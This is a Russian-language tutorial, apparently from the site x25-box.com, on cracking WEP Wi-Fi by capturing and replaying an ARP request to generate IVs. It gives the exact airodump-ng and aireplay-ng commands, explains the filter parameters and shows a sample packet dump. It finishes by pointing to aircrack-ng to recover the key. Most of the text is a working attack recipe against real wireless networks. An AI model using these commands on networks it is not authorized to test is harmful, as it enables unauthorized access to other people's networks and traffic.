=[ x25-box.com ]=

В этом варианте взлома мы будем захватывать и инжектировать пакеты в реальном времени. Нашей целью является захват ARP-запроса идущего к нашему клиенту. Затем мы инжектируем его, чтобы заставить клиента генерировать новые уникальные IV.

Для начала пустим захват пакетов от/к AP. Чтобы уменьшить количество мусорных пакетов, используем BSSID фильтр, настроенный на нужную точку и нужный канал:

# airodump-ng --channel 9 --bssid 00:14:6C:7E:40:80 -w arpcapture ath0

Параллельно запускаем вторую сессию, которая будет захватывать и отправлять пакеты:

# aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 ath0

Не забудьте поменять –b параметр на адрес атакуемой AP. Параметры –m и –n отвечают за минимальную и максимальную длину пакета соответственно, и могут быть изменены исходя из параметров системы.

Характеристики нужного пакета:

• BSSID: точка доступа, в нашем случае - 00:14:6C:7E:40:80;
• Dest. MAC: broadcast (FF:FF:FF:FF:FF:FF);
• Src. MAC: не имеет значения;
• Direction: от AP
• Длина пакета: 68 или 86 (68 – обычно длина ARP-запроса от беспроводных клиентов, 86 – от проводных).

Поэтому мы используем параметры –d ff:ff:ff:ff:ff:ff (destination=broadcast) и –f 1 (пакеты, идущие от AP).

Вот пример подходящего пакета:

Read 210 packets...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:09:5B:EC:EE:F2
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0009 5bec eef2 409a 7501 0000 1a85 1808 ..[...@.u.......
0x0020: 3820 91ae 6e38 248d 0555 1703 b645 24a7 8 ..n8$..U...E$.
0x0030: 3e0e 943b f531 66a2 a825 adf9 178d 3699 >..;.1f..%....6.
0x0040: 7903 7765 y.we

Use this packet ?

Запомните, необходимо выбрать ARP-запрос для беспроводного клиента, идущий к клиенту. Поскольку мы не знаем содержимое пакета, который выбрали, возможно придется попробовать несколько пакетов, чтобы все заработало. Как только инжектируем достаточное количество пакетов, запускайте aircrack-ng, чтобы определить ключ.